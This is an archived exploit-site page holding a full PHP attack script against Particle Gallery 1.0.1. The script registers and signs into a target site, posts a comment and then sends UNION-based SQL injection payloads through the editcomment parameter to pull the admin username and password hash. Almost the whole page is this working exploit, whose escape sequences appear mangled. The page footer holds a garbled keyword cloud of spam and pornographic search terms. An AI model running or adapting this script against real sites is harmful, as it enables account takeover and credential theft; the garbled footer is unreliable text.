about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Particle Gallery <= 1.0.1 Remote SQL Injection Exploit




2007-06-03 Particle Gallery <= 1.0.1 Remote SQL Injection Exploit 
Rated as : Critical

#!/usr/bin/php -q -d short_open_tag=on
<?php

/*

Explanation:

Function dbSecure(functions.php):

function dbSecure($code){
	
	if (get_magic_quotes_gpc()) {
	   $code = stripslashes($code);
	}
	
	if (function_exists("mysql_real_escape_string")){
		$code = mysql_real_escape_string($code);
	} elseif (function_exists("mysql_escape_string")){
		$code = mysql_escape_string($code);
	} else {
		$code = addslashes($code);
	}
	
	return $code;
}


Excellent function for SQL input validation, yet we don't even need this
function here as we don't 
need to add any quotes...haha!


Vulnerable Code(viewimage.php):

$t->set_var("COMMENT_ID", "");
if ($_GET["editcomment"] <> ""){
	$sql = "SELECT * FROM " . $dbprefix . "comments WHERE
commentid = " . dbSecure($_GET["editcomment"]);
	$cme = $db->execute($sql);
	if ($usr->Access > 1 || ($_SESSION["userid"] ==
$cme->fields["userid"])){
		// allow user to edit the comment
		$t->set_var("COMMENTS_TYPE", "Edit");
		$t->set_var("COMMENT_ID",
$cme->fields["commentid"]);
		$t->set_var("COMMENTS_FORM", $core .
"&commentspage=" . $page);
		if ($_POST["comments"] <> ""){
			$t->set_var("COMMENTS_TEXT",
un($_POST["comments"]));
		} else {
			$t->set_var("COMMENTS_TEXT",
$cme->fields["comments"]);
		}
	}


...classic!

*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

if ($argc<3) {
print
"-------------------------------------------------------------------------rn";
print "              Particle Gallery <= 1.0.1 SQL Injection
Exploitrn";
print
"-------------------------------------------------------------------------rn";
print "Usage: w4ck1ng_pg.php [HOST] [PATH]rnrn";
print "[HOST] 	  = Target server's hostname or ip addressrn";
print "[PATH] 	  = Path where Particle Gallery is locatedrn";
print "e.g. w4ck1ng_pg.php 0 victim.com /pg/rn";
print
"-------------------------------------------------------------------------rn";
print "            		 http://www.w4ck1ng.comrn";
print "            		        ...Silentzrn";
print
"-------------------------------------------------------------------------rn";
die;
}

function footer(){

print
"-------------------------------------------------------------------------rn";
print "            		 http://www.w4ck1ng.comrn";
print "            		        ...Silentzrn";
print
"-------------------------------------------------------------------------rn";

}

//Props to rgod for the following functions

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to
".$parts[0].":".$parts[1]." proxy...rn";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host = $argv[1];
$path = $argv[2];
$port=80;
$proxy="";

for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{
$cmd.=" ".$argv[$i];
}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo
'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}


print
"-------------------------------------------------------------------------rn";
print "              Particle Gallery <= 1.0.1 SQL Injection
Exploitrn";
print
"-------------------------------------------------------------------------rn";

    echo "rn[+] Checking if user exists...";

    $data="username=w4ck1ng";
    $data.="&password=w4ck1ng";
    $data.="&from=";
    $packet ="POST " . $p . "auth.php?do=signin
HTTP/1.1rn";
    $packet.="Content-Type:
application/x-www-form-urlencodedrn";
    $packet.="Host: ".$host."rn";
    $packet.="Content-Length: ".strlen($data)."rn";
    $packet.="Connection: Closernrn";
    $packet.=$data;

    sendpacketii($packet);

    if (strstr($html,"User Control Panel")){echo
"...Yep!rn";}
    else{echo "...Nope!"; 
 
    echo "rn[+] Registering...";

    $data="rusername=w4ck1ng";
    $data.="&password=w4ck1ng";
    $data.="&password2=w4ck1ng";
    $data.="&email=w4ck1ng%40www.com";
    $data.="&do=register";
    $packet ="POST " . $p . "auth.php?page=register
HTTP/1.1rn";
    $packet.="Content-Type:
application/x-www-form-urlencodedrn";
    $packet.="Host: ".$host."rn";
    $packet.="Content-Length: ".strlen($data)."rn";
    $packet.="Connection: Closernrn";
    $packet.=$data;

    sendpacketii($packet);

    $temp=explode("Set-Cookie: ",$html);
    $temp2=explode(" ",$temp[1]);
    $cookie=$temp2[0];

    if (strstr($html,"Location: index.php?act=newbie")){echo
"...Successful!rn";}
    if (strstr($html,"Registrations are not currently being
accepted.")){echo "...Registration Disabled!rn"; footer();
exit;}
    else{} }

    echo "[+] Signing In...";

    $data="username=w4ck1ng";
    $data.="&password=w4ck1ng";
    $data.="&from=";
    $packet ="POST " . $p . "auth.php?do=signin
HTTP/1.1rn";
    $packet.="Content-Type:
application/x-www-form-urlencodedrn";
    $packet.="Host: ".$host."rn";
    $packet.="Content-Length: ".strlen($data)."rn";
    $packet.="Connection: Closernrn";
    $packet.=$data;

    sendpacketii($packet);

    $temp=explode("Set-Cookie: ",$html);
    $temp2=explode(" ",$temp[1]);
    $cookie=$temp2[0];

    if (strstr($html,"Welcome to your account control
panel")){echo "...Successful!";}
    else{die("...Failed!rn"); footer(); exit;} 

    $packet ="GET " . $p . " HTTP/1.1rn";
    $packet.="Host: " . $host . "rn";
    $packet.="Cookie: " . $cookie . "rn";
    $packet.="Connection: Closernrn";
    sendpacketii($packet);

        if (strstr($html,"<td style="text-align:
right;"><a href="viewimage.php?imageid=")){

	    	$temp=explode("<td style="text-align:
right;"><a href="viewimage.php?imageid=",$html);
    		$temp2=explode("">",$temp[1]);
		$imageid=$temp2[0];

		echo "rn[+] Image ID Retrieved..." . $imageid .
"!n";}

	else{echo "rn[-] Cannot retrieve a valid image ID...n";
footer(); exit;}


    $data="comments=Your+about+to+get+owned%21";
    $data.="&do=comment";
    $data.="&commentid=";
    $packet ="POST " . $p . "viewimage.php?imageid=" .
$imageid . " HTTP/1.1rn";
    $packet.="Content-Type:
application/x-www-form-urlencodedrn";
    $packet.="Host: ".$host."rn";
    $packet.="Content-Length: ".strlen($data)."rn";
    $packet.="Cookie: " . $cookie . "rn";
    $packet.="Connection: Closernrn";
    $packet.=$data;

    sendpacketii($packet);

    if (strstr($html,"Comments posted successfully!")){echo
"[+] Posting comment...Done!n";}
    else{echo "[-] Posting comment...Failed!n"; footer(); exit;}


    $sqlArray = array(
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,54),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,55),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,56),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,57),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,48),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,49),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,50),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,51),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*"
);

for ($i=0; $i<=count($sqlArray); $i++){

    $packet ="GET " . $p . $sqlArray[$i] . "
HTTP/1.1rn";
    $packet.="Host: " . $host . "rn";
    $packet.="Cookie: " . $cookie . "rn";
    $packet.="Connection: Closernrn";
    sendpacketii($packet);

    if
(strstr($html,"name="comments">Username=")){
	    	$temp3=explode("id="comments"
name="comments">Username=",$html);
    		$temp4=explode(":",$temp3[1]);
		$ret_user=$temp4[0];

		echo "rn[+] Admin User: " . $ret_user;}

    
	elseif (strstr($html,"404")){
			echo "rn[-] Image ID is not valid, please try another!";
footer(); exit;}
    else{} 
}

    $sqlArray = array(
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,54),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,55),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,56),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,57),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,48),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,49),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,50),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,51),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*"
);

for ($i=0; $i<=count($sqlArray); $i++){

    $packet ="GET " . $p . $sqlArray[$i] . "
HTTP/1.1rn";
    $packet.="Host: " . $host . "rn";
    $packet.="Cookie: " . $cookie . "rn";
    $packet.="Connection: Closernrn";
    sendpacketii($packet);

    if (strstr($html,":Hash=")){
	    	$temp3=explode("Hash=",$html);
    		$temp4=explode("</textarea>",$temp3[1]);
		$ret_hash=$temp4[0];

		echo "rn[+] Admin User: " . $ret_hash . "n";}
    else{} 
}

footer();

?>
securitydot.net - 2007-06-03

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 10:09:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.tokyo- namitha se WWW.indian P...F.html porni& Bangla sex ms02-020 jasperforg GET+%252Fg gdmnw.net. Www.xxx18. tamil sex Jetty champions porno agad classified bet.com www.363xk. www.pkubos www.sexop. www.65174. Nakedfatla Zen Cart. porn hindi box.fohee. www.cnshop VIDEO FUCK www.fzla8. lg 880 porno vedi myheqi.cn talgu sex ladp H...v6id.t myheqi.com php 5.0.0 FREE NUDE 200 /compo pornsite newswriter cat /error Shluha ?????+???? DotNetInst www.fw1314 News Searc Nude girl port 631 www.hotsox cid remote